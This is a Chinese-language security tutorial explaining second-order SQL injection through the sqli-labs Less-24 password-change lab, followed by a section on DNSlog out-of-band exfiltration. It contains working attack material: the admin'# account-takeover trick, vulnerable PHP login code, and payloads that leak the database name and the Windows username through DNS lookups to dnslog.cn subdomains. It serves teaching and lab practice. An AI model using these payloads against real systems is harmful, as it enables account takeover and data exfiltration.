二次注入

1. 原理

二次注入是存储型注入，可以理解为构造恶意数据存储在数据库后，恶意数据被读取并进入到了SQL查询语句所导致的注入。恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中，当Web程序调用存储在数据库中的恶意数据并执行SQL查询时，就发生了SQL二次注入。详细点来讲，就是在第一次进行数据库插入数据的时候，仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义，在写入数据库的时候还是保留了原来的数据，但是数据本身还是脏数据。在将数据存入到了数据库中之后，开发者就认为数据是可信的。在下一次进行需要进行查询的时候，直接从数据库中取出了脏数据，没有进行进一步的检验和处理，这样就会造成SQL的二次注入。比如在第一次插入数据的时候，数据中带有单引号，直接插入到了数据库中；然后在下一次使用中在拼凑的过程中，就形成了二次注入。二次注入无法通过扫描工具或者代码自己手工测试出来的，二次注入一般会产生在网站程序源代码才会发现的注入漏洞，从前端或者黑盒测试是看不到这个漏洞的。

1. 过程

第一步：插入恶意数据

第一次进行数据库插入数据的时候，仅仅对其中的特殊字符进行了转义，在写入数据库的时候还是保留了原来的数据，但是数据本身包含恶意内容。

第二步：引用恶意数据

在将数据存入到了数据库中之后，开发者就认为数据是可信的。在下一次需要进行查询的时候，直接从数据库中取出了恶意数据，没有进行进一步的检验和处理，这样就会造成SQL的二次注入。

1. 过程原理图

1. 思路

a. 黑客通过构造数据的形式，在浏览器或者其他软件中提交HTTP数据报文请求到服务端进行处理，提交的数据报文请求中可能包含了黑客构造的SQL语句或者命令。

b. 服务端应用程序会将黑客提交的数据信息进行存储，通常是保存在数据库中，保存的数据信息的主要作用是为应用程序执行其他功能提供原始输入数据并对客户端请求做出响应。

c. 黑客向服务端发送第二个与第一次不相同的请求数据信息。

d. 服务端接收到黑客提交的第二个请求信息后，为了处理该请求，服务端会查询数据库中已经存储的数据信息并处理，从而导致黑客在第一次请求中构造的SQL语句或者命令在服务端环境中执行。

e. 服务端返回执行的处理结果数据信息，黑客可以通过返回的结果数据信息判断二次注入漏洞利用是否成功。

2. sqlilabs-less24-post登录框&二次注入

打开网页看到一个登陆界面，输入admin/admin后是修改密码的界面。改密码涉及到对数据库的记录进行替换，我们怀疑此处有一个 UPDATE 语句。

在任何界面进行注入应该都是无效的，因为操作失败时会跳转到其他页面，而没有任何例如错误的回显信息。此处考虑的就不是之前那些把敏感信息弄出来的注入了，而是考虑利用改密码操作夺取其他账号的控制权。此处我们考虑二次注入，首先我们构造一个特殊的用户，该用户的用户名为 “admin'#”，密码随便设

查看数据库，已经添加成功

 使用admin’#进行登录

登录成功后，更改密码为1234

密码更改成功

返回主界面使用账户：admin 密码：1234登录

登陆成功

此时如果将这个用户作为过滤条件实现记录的修改，该用户名后面的 “'#” 不仅能闭合字段，也能把后面的内容注释掉。而且成功闭合后，我们实际上操作的用户名应该是 “admin”。修改密码成功之后，使用用户名 “admin” 和我们修改的密码进行登录，发现我们夺去了该用户的密码，登录成功

网页源码

登录界面

functionsqllogin(){

$username=mysql_real_escape_string($_POST["login_user"]);

$password=mysql_real_escape_string($_POST["login_password"]);

$sql="SELECT * FROM users WHERE username='$username' and password='$password'";

//$sql = "SELECT COUNT(*) FROM users WHERE username='$username' and password='$password'";

$res=mysql_query($sql) ordie('You tried to be real smart, Try harder!!!! :( ');

$row=mysql_fetch_row($res); //print_r($row) ;

if ($row[1])

{

return$row[1];

}

else

{

return0; }

}

DNSlog注入

1. 原理

首先需要有一个可以配置的域名，比如：ceye.io，然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A，然后再服务器 A 上配置好 DNS Server，这样以来所有 ceye.io 及其子域名的查询都会到 服务器 A 上，这时就能够实时地监控域名查询请求了。DNS在解析的时候会留下日志，咱们这个就是读取多级域名的解析日志，来获取信息。简单来说就是把信息放在高级域名中，传递到自己这，然后读取日志，获取信息

1. 利用场景

在sql注入时为布尔盲注、时间盲注，注入的效率低且线程高容易被waf拦截，又或者是目标站点没有回显，我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功，这时候就要用到我们的DNSlog注入。

1. 推荐平台

a. DNSLog Platform

b. CEYE - Monitor service for security testing（需要注册）    

c. http://admin.dnslog.link

2.应用场景：

解决不回显，反向连接，SQL注入，命令执行，SSRF等

SQL注入：

select load_file(concat('\\\\',(select database()),'.7logee.dnslog.cn\\aa'));

and (select load_file(concat('//',(select database()),'.69knl9.dnslog.cn/abc'))) //调用load_file去执行访问dsnlog，把数据外带）

命令执行：

ping %USERNAME%.7logee.dnslog.cn